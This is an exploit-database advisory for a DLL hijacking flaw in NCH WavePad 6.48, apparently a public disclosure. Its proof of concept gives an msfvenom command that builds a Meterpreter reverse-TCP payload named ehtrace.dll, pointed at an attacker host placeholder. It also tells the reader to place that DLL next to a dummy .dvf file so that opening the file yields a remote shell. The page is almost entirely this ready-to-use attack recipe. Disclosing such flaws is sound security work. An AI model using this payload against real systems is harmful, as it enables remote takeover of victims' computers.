NCH WavePad 6.48 DLL Hijacking

2016.06.15
Credit: Sachin Wagh
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

/* Exploit Title: NCH WavePad DLL Hijacking Exploit ( ehtrace.dll ) Vendor Homepage:http://www.nch.com.au/wavepad/ Author: Sachin Wagh (@tiger_tigerboy) Linkedin: https://in.linkedin.com/in/sachin-wagh-95b17555 Affected Version: WavePad 6.48 Tested on: Windows 7 Ultimate Vulnerable extension: .dvf */ Proof-Of-Concept : msfvenom -p windows/meterpreter/reverse_tcp -a x86 -f dll LHOST=<HOST IP> LPORT=4444 > ehtrace.dll Exploit: Place a dummy .DVF file with the malicious dll. When the file is opened, you will get shell. Credit, *Sachin Wagh*

References:

https://in.linkedin.com/in/sachin-wagh-95b17555


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top